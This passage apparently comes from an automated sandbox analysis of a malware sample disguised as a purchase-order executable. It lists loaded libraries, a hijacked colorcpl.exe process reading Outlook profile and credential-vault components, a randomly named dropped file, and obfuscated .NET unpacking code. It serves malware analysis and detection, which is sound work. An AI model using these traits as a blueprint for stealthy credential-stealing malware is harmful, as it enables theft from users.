                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\2998MOD PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 2998MOD PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 2998MOD PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: 2998MOD PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: colorcpl.pdbGCTL source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560731508.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: colorcpl.pdb source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560731508.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sePlrCtAXqpc.exe, 00000007.00000002.3560434817.0000000000DBE000.00000002.00000001.01000000.0000000C.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562689546.0000000000DBE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2043927456.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2041561877.0000000004929000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 2998MOD PO.exe, 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.2043927456.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2041561877.0000000004929000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SWBp.pdb source: 2998MOD PO.exe
                Source: Binary string: SWBp.pdbSHA256Y source: 2998MOD PO.exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.cs.Net Code: TnpYr8bfmj System.Reflection.Assembly.Load(byte[])
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.cs.Net Code: TnpYr8bfmj System.Reflection.Assembly.Load(byte[])
                Source: 0.2.2998MOD PO.exe.5400000.2.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.cs.Net Code: TnpYr8bfmj System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_05648B25 push FFFFFF8Bh; iretd 0_2_05648B27
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_00406155 push ss; retf 4_2_00406160
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_00403270 push eax; ret 4_2_00403272
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0040227F pushad ; retf 4_2_00402280
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0040BB30 push eax; ret 4_2_0040BB31
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_00404DCD push ebx; iretd 4_2_00404DD8
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_004066BD push edx; iretd 4_2_004066BF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_00413F7E pushad ; retf 4_2_00414025
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_00413FC5 pushad ; retf 4_2_00414025
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019809AD push ecx; mov dword ptr [esp], ecx4_2_019809B6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04C827FA pushad ; ret 8_2_04C827F9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04C8225F pushad ; ret 8_2_04C827F9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04C8283D push eax; iretd 8_2_04C82858
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CB09AD push ecx; mov dword ptr [esp], ecx8_2_04CB09B6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04C8106B push edi; retf 8_2_04C8108A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04C87AAB push ecx; iretd 8_2_04C87ABE
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4C447 push cs; ret 8_2_04B4C44B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4019B pushfd ; iretd 8_2_04B4019C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B55202 push eax; ret 8_2_04B55204
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B43D46 pushad ; ret 8_2_04B43D47
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4CF48 push ebx; iretd 8_2_04B4CF49
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4BBF5 push ecx; ret 8_2_04B4BBF6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B44B06 push edi; iretd 8_2_04B44B07
                Source: 2998MOD PO.exeStatic PE information: section name: .text entropy: 7.708866164549466
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, Yx0GApFkpsOyylP5i8.csHigh entropy of concatenated method names: 'sA2R4ibK34', 'tv1RdkLVgM', 'UXFZDEmtjX', 'URKZ9A06Jg', 'aTiZBUJliv', 'BrRZIM0HI6', 'ejrZb5ZtQ6', 'TWYZO2LRhh', 'EDUZENVdrs', 'l2DZl7rByE'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, BD0tkRyW0NvFS0Kras.csHigh entropy of concatenated method names: 'Ldk3TZ8LQs', 'Dkv3CBQhnb', 'DyfQG8jBBo', 'PJmQAD6PDC', 't5n3LrI8fd', 'BZx3kIeIjZ', 'g0p3gxV9LY', 'pos3JUwNWA', 'lOf3MhhA8g', 'n863cqGgXV'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.csHigh entropy of concatenated method names: 'vcsqj7bqfr', 'uivqv0brPO', 'EwBqH4B36e', 'mjVqZOHhgv', 'qfjqRfwDJk', 'e1Bqxm6JNa', 'nMXqssQLgD', 'nFlqPxrWg1', 'MjlqpYj8Tn', 'CHGqol9Spy'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, f6ijMJHORTQRhNugqL.csHigh entropy of concatenated method names: 'Dispose', 'g9WAKlRnb6', 'XhqVUeR2BV', 'U9vGGhuAMq', 'PPyACj87Kr', 'FScAzneM7v', 'ProcessDialogKey', 'C6GVGjX7Sv', 'jtbVAl4V0t', 'XAeVVB8YJ6'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, WLiWCAcvwIfxDKCaWi.csHigh entropy of concatenated method names: 'ToString', 'igQuLDVyDD', 'kdruUNml9f', 'xjauDtEpHq', 'EgLu93fV1P', 'GCluBUKZmZ', 'oQWuIq4dmV', 'QUhubWyBrw', 'FYWuOUYrsX', 'E4wuEOltyO'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, kyj87KTr7ScneM7v26.csHigh entropy of concatenated method names: 'plCQvxEf01', 'XGaQHXS2hu', 'hm3QZypwaZ', 'aAWQRpvqbc', 'eCoQxjdrmi', 'k7aQsJqiI1', 'a03QPSwyiq', 'bKfQpHlGwW', 'NlwQoeeV4Q', 'dkPQtIBUFL'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, e7iHOazfdRADLFCyRX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CbFmeSxOJx', 'wdrm18NP2O', 'WNdmuOfnFQ', 'cs1m38lhVU', 'ceUmQxMkAV', 'PQcmmfOJD5', 'g4emaKE7yJ'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, WMgNXPg2RPSOrhK9eh.csHigh entropy of concatenated method names: 'TjKeW6uuhl', 'JXaeNak938', 'DUfe79wOjP', 'JZBeUGwj6a', 'B8ue90HnLg', 'mOSeBFsg97', 'jdKeb4XNuj', 'fLjeOOlJUe', 'zD1elAbgA7', 'SlBeLQwPAF'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, TWS96jZxAX3EN502gS.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NCLVKjoOGe', 'J3aVC65g2J', 'nKvVzcmJkP', 'UdRqGQQncQ', 'ayMqAQjPUp', 'YyuqVjS1j2', 'lq7qqnsDgr', 'AnP8IBzLo4heWACJmJ'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, yoC8k9AGeE8sgPPbwXA.csHigh entropy of concatenated method names: 'QDlmS25Jsq', 'JYumnoZws9', 'poYmr8lGNv', 'IRUm0MaH8k', 'pvUm4ThjHS', 'IMhm2R26Kr', 'NwxmdRDWpi', 'PvWmWnCle1', 'mmhmN6vLPA', 'XtmmF9qsUT'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, WnrTXVbngDZ3l5EyUi.csHigh entropy of concatenated method names: 'C6qsvkEMuJ', 'sU8sZI8ecH', 'vk6sxtLQGc', 'a9QxCfCQsl', 'fyhxzvp9QX', 'TCPsG20i6S', 'BYFsAYwXGd', 'NgnsVYGuNv', 'qbdsqKWHQJ', 'oT5sY5xSq0'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, GuVZeiWWGgyIsVPOZB.csHigh entropy of concatenated method names: 'hF7HJBiPwH', 'j1YHMI118Y', 'ce1Hc5DkQT', 'E0WH8cGuox', 'V0eHhT1jbp', 'weGHyuOcHq', 'qAaH5aie6X', 'x1wHT8S8cr', 'tXoHKdV8qc', 'XUnHCkddwl'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, J8YJ6nCparoCklRBhk.csHigh entropy of concatenated method names: 'OdemAsdVH6', 'dekmq8MPrV', 'bsEmYZtRU9', 'TqKmvaDUWB', 'aoRmHfCoyo', 'tGZmRf2hbN', 'KhymxNdQfB', 'fsyQ55L4Yg', 'FRSQTxesBd', 'QrwQKl5Wh6'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, e6csmyNd1AuCqsOHuU.csHigh entropy of concatenated method names: 'Re7Z0N6w07', 'UClZ2UkCZs', 'tOIZW0hHJL', 'hGAZNw4gA5', 'RUQZ1vdC3o', 'lLoZuloGso', 'DllZ3mHlmy', 'nWaZQemowf', 'dPVZmZW54H', 'JywZa10SRi'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, R92djQEdSh5jkUnu7Y.csHigh entropy of concatenated method names: 'RFgsSkmWxD', 'hyYsnyxpcB', 'qassrl3ws5', 'wv0s047Uua', 'vTQs4muanQ', 'tXTs2Ngl5D', 'Q5psd8PDBQ', 'e2HsWqv4Km', 'BdQsNFIthg', 'sDXsFP8oZ4'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, ajX7SvKstbl4V0tKAe.csHigh entropy of concatenated method names: 'rLcQ7qDm4V', 'MS1QUtK6OX', 'raVQDPtmsg', 'Oc7Q9yZraa', 'pSaQJmcfJD', 'g4kQBFGvtw', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, dBKwEy8HgOOo4pITZv.csHigh entropy of concatenated method names: 'Mw23oEYFvY', 'B053t70mF7', 'ToString', 'OD43vQRfgJ', 'Avv3HRtxVQ', 'p9d3ZkxhMN', 'V2s3RMS0bh', 'aef3xgUBxo', 'lYS3s06pnc', 'HXY3Pk76dN'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, kQ6WtiAqcS5W9tw0Oxs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O7DaJuaw7A', 'tgIaMIOEAV', 'rt9acop79a', 'iUMa8VqfaN', 'N0nahGgG28', 'rh4ayENCgB', 'Udxa5rcUTJ'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, tFIMTA79oCEVXEbenh.csHigh entropy of concatenated method names: 'XUTxjK4Woj', 'VVQxHQvYJj', 'WgaxRYJcfy', 'FJbxs3fpwa', 'BwCxPkC0U5', 'Jy2RhO9jMZ', 'ATERypmftS', 'i2cR5upHoM', 'acqRTWjaiw', 'PwPRKJQw9W'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, xdVRuwVnxyYCMZQs8n.csHigh entropy of concatenated method names: 'O5krvD0OT', 'eQO0C377x', 'H1Y25QDcO', 'L3QdwFmTE', 'NZrNynmGt', 'YxOFxuSMM', 'jOOjjlZu3PLatRliU8', 'V58a8IE0CyRCCoJ09h', 'KOdQtuFon', 'K4gamTItu'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, xKPA6QYeUQDw6KZEyv.csHigh entropy of concatenated method names: 'YIUAsuVZei', 'DGgAPyIsVP', 'Vd1AoAuCqs', 'MHuAtUCx0G', 'NP5A1i8fFI', 'RTAAu9oCEV', 'n6gmfh5pChGwbgX4pJ', 'jNpIZ2vXCOO8H7Z3o3', 'A1XAA6Ty1v', 'euMAqjvVIi'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, Yx0GApFkpsOyylP5i8.csHigh entropy of concatenated method names: 'sA2R4ibK34', 'tv1RdkLVgM', 'UXFZDEmtjX', 'URKZ9A06Jg', 'aTiZBUJliv', 'BrRZIM0HI6', 'ejrZb5ZtQ6', 'TWYZO2LRhh', 'EDUZENVdrs', 'l2DZl7rByE'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, BD0tkRyW0NvFS0Kras.csHigh entropy of concatenated method names: 'Ldk3TZ8LQs', 'Dkv3CBQhnb', 'DyfQG8jBBo', 'PJmQAD6PDC', 't5n3LrI8fd', 'BZx3kIeIjZ', 'g0p3gxV9LY', 'pos3JUwNWA', 'lOf3MhhA8g', 'n863cqGgXV'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.csHigh entropy of concatenated method names: 'vcsqj7bqfr', 'uivqv0brPO', 'EwBqH4B36e', 'mjVqZOHhgv', 'qfjqRfwDJk', 'e1Bqxm6JNa', 'nMXqssQLgD', 'nFlqPxrWg1', 'MjlqpYj8Tn', 'CHGqol9Spy'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, f6ijMJHORTQRhNugqL.csHigh entropy of concatenated method names: 'Dispose', 'g9WAKlRnb6', 'XhqVUeR2BV', 'U9vGGhuAMq', 'PPyACj87Kr', 'FScAzneM7v', 'ProcessDialogKey', 'C6GVGjX7Sv', 'jtbVAl4V0t', 'XAeVVB8YJ6'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, WLiWCAcvwIfxDKCaWi.csHigh entropy of concatenated method names: 'ToString', 'igQuLDVyDD', 'kdruUNml9f', 'xjauDtEpHq', 'EgLu93fV1P', 'GCluBUKZmZ', 'oQWuIq4dmV', 'QUhubWyBrw', 'FYWuOUYrsX', 'E4wuEOltyO'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, kyj87KTr7ScneM7v26.csHigh entropy of concatenated method names: 'plCQvxEf01', 'XGaQHXS2hu', 'hm3QZypwaZ', 'aAWQRpvqbc', 'eCoQxjdrmi', 'k7aQsJqiI1', 'a03QPSwyiq', 'bKfQpHlGwW', 'NlwQoeeV4Q', 'dkPQtIBUFL'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, e7iHOazfdRADLFCyRX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CbFmeSxOJx', 'wdrm18NP2O', 'WNdmuOfnFQ', 'cs1m38lhVU', 'ceUmQxMkAV', 'PQcmmfOJD5', 'g4emaKE7yJ'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, WMgNXPg2RPSOrhK9eh.csHigh entropy of concatenated method names: 'TjKeW6uuhl', 'JXaeNak938', 'DUfe79wOjP', 'JZBeUGwj6a', 'B8ue90HnLg', 'mOSeBFsg97', 'jdKeb4XNuj', 'fLjeOOlJUe', 'zD1elAbgA7', 'SlBeLQwPAF'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, TWS96jZxAX3EN502gS.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NCLVKjoOGe', 'J3aVC65g2J', 'nKvVzcmJkP', 'UdRqGQQncQ', 'ayMqAQjPUp', 'YyuqVjS1j2', 'lq7qqnsDgr', 'AnP8IBzLo4heWACJmJ'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, yoC8k9AGeE8sgPPbwXA.csHigh entropy of concatenated method names: 'QDlmS25Jsq', 'JYumnoZws9', 'poYmr8lGNv', 'IRUm0MaH8k', 'pvUm4ThjHS', 'IMhm2R26Kr', 'NwxmdRDWpi', 'PvWmWnCle1', 'mmhmN6vLPA', 'XtmmF9qsUT'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, WnrTXVbngDZ3l5EyUi.csHigh entropy of concatenated method names: 'C6qsvkEMuJ', 'sU8sZI8ecH', 'vk6sxtLQGc', 'a9QxCfCQsl', 'fyhxzvp9QX', 'TCPsG20i6S', 'BYFsAYwXGd', 'NgnsVYGuNv', 'qbdsqKWHQJ', 'oT5sY5xSq0'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, GuVZeiWWGgyIsVPOZB.csHigh entropy of concatenated method names: 'hF7HJBiPwH', 'j1YHMI118Y', 'ce1Hc5DkQT', 'E0WH8cGuox', 'V0eHhT1jbp', 'weGHyuOcHq', 'qAaH5aie6X', 'x1wHT8S8cr', 'tXoHKdV8qc', 'XUnHCkddwl'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, J8YJ6nCparoCklRBhk.csHigh entropy of concatenated method names: 'OdemAsdVH6', 'dekmq8MPrV', 'bsEmYZtRU9', 'TqKmvaDUWB', 'aoRmHfCoyo', 'tGZmRf2hbN', 'KhymxNdQfB', 'fsyQ55L4Yg', 'FRSQTxesBd', 'QrwQKl5Wh6'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, e6csmyNd1AuCqsOHuU.csHigh entropy of concatenated method names: 'Re7Z0N6w07', 'UClZ2UkCZs', 'tOIZW0hHJL', 'hGAZNw4gA5', 'RUQZ1vdC3o', 'lLoZuloGso', 'DllZ3mHlmy', 'nWaZQemowf', 'dPVZmZW54H', 'JywZa10SRi'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, R92djQEdSh5jkUnu7Y.csHigh entropy of concatenated method names: 'RFgsSkmWxD', 'hyYsnyxpcB', 'qassrl3ws5', 'wv0s047Uua', 'vTQs4muanQ', 'tXTs2Ngl5D', 'Q5psd8PDBQ', 'e2HsWqv4Km', 'BdQsNFIthg', 'sDXsFP8oZ4'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, ajX7SvKstbl4V0tKAe.csHigh entropy of concatenated method names: 'rLcQ7qDm4V', 'MS1QUtK6OX', 'raVQDPtmsg', 'Oc7Q9yZraa', 'pSaQJmcfJD', 'g4kQBFGvtw', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, dBKwEy8HgOOo4pITZv.csHigh entropy of concatenated method names: 'Mw23oEYFvY', 'B053t70mF7', 'ToString', 'OD43vQRfgJ', 'Avv3HRtxVQ', 'p9d3ZkxhMN', 'V2s3RMS0bh', 'aef3xgUBxo', 'lYS3s06pnc', 'HXY3Pk76dN'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, kQ6WtiAqcS5W9tw0Oxs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O7DaJuaw7A', 'tgIaMIOEAV', 'rt9acop79a', 'iUMa8VqfaN', 'N0nahGgG28', 'rh4ayENCgB', 'Udxa5rcUTJ'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, tFIMTA79oCEVXEbenh.csHigh entropy of concatenated method names: 'XUTxjK4Woj', 'VVQxHQvYJj', 'WgaxRYJcfy', 'FJbxs3fpwa', 'BwCxPkC0U5', 'Jy2RhO9jMZ', 'ATERypmftS', 'i2cR5upHoM', 'acqRTWjaiw', 'PwPRKJQw9W'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, xdVRuwVnxyYCMZQs8n.csHigh entropy of concatenated method names: 'O5krvD0OT', 'eQO0C377x', 'H1Y25QDcO', 'L3QdwFmTE', 'NZrNynmGt', 'YxOFxuSMM', 'jOOjjlZu3PLatRliU8', 'V58a8IE0CyRCCoJ09h', 'KOdQtuFon', 'K4gamTItu'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, xKPA6QYeUQDw6KZEyv.csHigh entropy of concatenated method names: 'YIUAsuVZei', 'DGgAPyIsVP', 'Vd1AoAuCqs', 'MHuAtUCx0G', 'NP5A1i8fFI', 'RTAAu9oCEV', 'n6gmfh5pChGwbgX4pJ', 'jNpIZ2vXCOO8H7Z3o3', 'A1XAA6Ty1v', 'euMAqjvVIi'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, Yx0GApFkpsOyylP5i8.csHigh entropy of concatenated method names: 'sA2R4ibK34', 'tv1RdkLVgM', 'UXFZDEmtjX', 'URKZ9A06Jg', 'aTiZBUJliv', 'BrRZIM0HI6', 'ejrZb5ZtQ6', 'TWYZO2LRhh', 'EDUZENVdrs', 'l2DZl7rByE'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, BD0tkRyW0NvFS0Kras.csHigh entropy of concatenated method names: 'Ldk3TZ8LQs', 'Dkv3CBQhnb', 'DyfQG8jBBo', 'PJmQAD6PDC', 't5n3LrI8fd', 'BZx3kIeIjZ', 'g0p3gxV9LY', 'pos3JUwNWA', 'lOf3MhhA8g', 'n863cqGgXV'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.csHigh entropy of concatenated method names: 'vcsqj7bqfr', 'uivqv0brPO', 'EwBqH4B36e', 'mjVqZOHhgv', 'qfjqRfwDJk', 'e1Bqxm6JNa', 'nMXqssQLgD', 'nFlqPxrWg1', 'MjlqpYj8Tn', 'CHGqol9Spy'
